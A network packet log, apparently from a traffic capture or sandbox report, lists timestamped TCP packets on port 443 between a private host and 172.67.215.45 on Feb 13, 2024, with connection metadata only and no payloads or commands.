Feb 13, 2024 15:08:06.631133080 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.631190062 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.632015944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.632038116 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.632064104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.632074118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.632082939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.632574081 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.632606030 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.632622957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.632630110 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.632642031 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.633007050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.633032084 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.633055925 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.633064032 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.633075953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.633111000 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.633601904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.633626938 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.633647919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.633655071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.633666039 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.634017944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.634043932 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.634059906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.634067059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.634083986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.634767056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.634788990 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.634814978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.634824991 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.634833097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.635194063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.635227919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.635242939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.635250092 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.635277033 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.635735989 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.635761023 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.635790110 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.635797024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.635812998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.636084080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.636110067 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.636130095 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.636136055 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.636156082 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.636810064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.636831999 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.636857033 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.636866093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.636877060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.637139082 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.637165070 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.637187958 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.637195110 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.637208939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.637908936 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.637937069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.637959957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.637967110 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.637984037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.638040066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.638068914 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.638081074 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.638088942 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.638113022 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.638151884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.638746977 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.638771057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.638803005 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.638809919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.638822079 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.639111042 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.639153957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.639161110 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.639170885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.639203072 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.640161037 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640189886 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640216112 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.640223026 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640238047 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.640414000 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640439987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640455008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.640460968 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640485048 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.640930891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640963078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.640986919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.640996933 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.641009092 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.641244888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.641272068 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.641290903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.641298056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.641316891 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.641345024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.642787933 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.642811060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.642837048 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.642844915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.642860889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.642951012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.642965078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643002987 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.643009901 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643022060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.643034935 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.643452883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643476009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643507004 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.643516064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643527985 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.643860102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643892050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643898964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.643908024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.643946886 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.645056009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.645076990 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.645112991 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.645119905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.645129919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.645347118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.645376921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.645406008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.645414114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.645432949 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.646632910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.646658897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.646687984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.646696091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.646707058 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.646795034 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.646819115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.646838903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.646850109 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.646857977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.646876097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.648101091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.648123026 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.648150921 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.648158073 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.648175001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.648248911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.648272991 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.648288012 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.648297071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.648319006 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.648324966 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.649534941 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.649557114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.649588108 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.649594069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.649606943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.649708986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.649734020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.649753094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.649760962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.649771929 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.649806023 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.651137114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.651160955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.651190042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.651199102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.651211023 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.651453018 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.651483059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.651498079 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.651505947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.651516914 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.651534081 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.652376890 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.652404070 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.652426958 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.652434111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.652448893 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.652564049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.652591944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.652607918 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.652615070 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.652635098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.653862953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.653883934 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.653907061 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.653914928 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.653928995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.653939009 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.654098988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.654126883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.654143095 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.654150963 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.654170990 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.654964924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.654987097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.655014992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.655024052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.655035019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.655173063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.655199051 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.655216932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.655222893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.655237913 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.656393051 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.656419039 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.656435966 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.656443119 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.656454086 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.656472921 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.656505108 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.656691074 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.656713009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.656737089 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.656744003 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.656754971 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.657910109 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.657938004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.657958984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.657967091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.657978058 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.658128977 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.658150911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.658170938 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.658178091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.658196926 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.659451962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.659480095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.659502983 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.659509897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.659521103 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.659651995 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.659673929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.659710884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.659719944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.659729958 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.660927057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.660955906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.660980940 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.660989046 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.661005020 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.661143064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.661165953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.661186934 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.661194086 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.661206961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.662524939 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.662556887 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.662581921 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.662590981 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.662601948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.662792921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.662815094 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.662834883 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.662842035 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.662856102 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.662864923 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.663593054 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.663620949 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.663636923 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.663645029 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.663669109 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.663810968 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.663831949 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.663853884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.663861036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.663873911 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.664957047 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.664985895 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.665000916 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.665010929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.665040016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.665061951 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.665085077 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.665101051 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.665107965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.665127993 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.665133953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.665215015 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.666376114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.666405916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.666433096 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.666440010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.666451931 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.666600943 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.666627884 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.666649103 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.666655064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.666671038 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.668540955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.668564081 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.668591976 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.668601036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.668616056 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.668833017 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.668863058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.668884039 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.668893099 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.668905020 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.669219971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.669241905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.669269085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.669276953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.669287920 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.669471025 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.669500113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.669521093 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.669528008 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.669562101 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.670945883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.670969009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.670994997 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.671001911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671015978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.671264887 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671293020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671310902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.671319008 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671340942 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.671827078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671848059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671875000 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.671883106 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.671895027 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.672161102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.672190905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.672214031 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.672220945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.672240019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.673590899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.673621893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.673643112 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.673650026 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.673666954 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.673813105 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.673841953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.673846960 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.673861027 CET	443	49169	172.67.215.45	192.168.2.22
